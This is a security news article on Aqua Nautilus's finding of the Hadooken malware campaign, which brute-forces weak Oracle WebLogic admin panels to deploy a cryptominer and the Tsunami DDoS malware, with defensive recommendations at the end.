Security researchers at Aqua Nautilus recently discovered a threat actor using a cryptominer and distributed denial-of-service (DDoS) malware to target Oracle WebLogic Servers with a malicious payload dubbed “Hadooken.”
The investigation began when Aqua Nautilus detected Hadooken in action on one of their honeypots last month. Further analysis revealed that the threat actor gained access to Aqua’s WebLogic honeypot by brute-forcing into the administration panel. The malicious Hadooken payload, named after a move in the Street Fighter video game series, was then deployed using two separate scripts—a Python script and a “c” shell script—designed to execute Hadooken on the compromised system and delete the file afterward.
Lead researcher Assaf Morag from Aqua explained that the shell script version of Hadooken also attempted to extract SSH data from various directories to target known servers and propagate the malware laterally across connected environments.
Oracle’s WebLogic Server is widely used by organizations for building and deploying Java applications, with deployments spanning various industries such as banking, healthcare, and manufacturing. The platform has been a frequent target for attacks due to critical vulnerabilities and configuration errors like weak passwords and exposed admin consoles.
In an attack on Aqua’s honeypot, the threat actor bypassed security measures by using a weak password, enabling the deployment of Hadooken along with the Tsunami malware for DDoS attacks and a cryptominer. The malware also created cron jobs to sustain persistence on the compromised system.
Aqua’s analysis indicated that while Tsunami was not actively utilized in the attack, there is a possibility of its usage in future stages. Furthermore, the threat actor could potentially modify Hadooken to target other Linux platforms beyond WebLogic Servers. The malware also showed links to Rhombus and NoEscape ransomware, though they were not deployed during the honeypot attack.
The attackers, identified with IP addresses in Germany and Russia, have demonstrated a capability to download Hadooken on compromised systems. Aqua noted the connection of the German IP address to previous threat groups like TeamTNT and Gang 8220, but there is no direct evidence linking them to the Hadooken campaign.
To combat threats like Hadooken, Aqua recommends organizations employ infrastructure-as-code scanning tools, cloud security posture management tools, Kubernetes security solutions, runtime security tools, and container security tools to enhance their security posture.
In conclusion, the emergence of Hadooken targeting Oracle WebLogic Servers underscores the ongoing challenges faced by organizations in securing critical infrastructure against sophisticated cyber threats. By remaining vigilant and utilizing advanced security measures, enterprises can mitigate the risks associated with such malicious activities.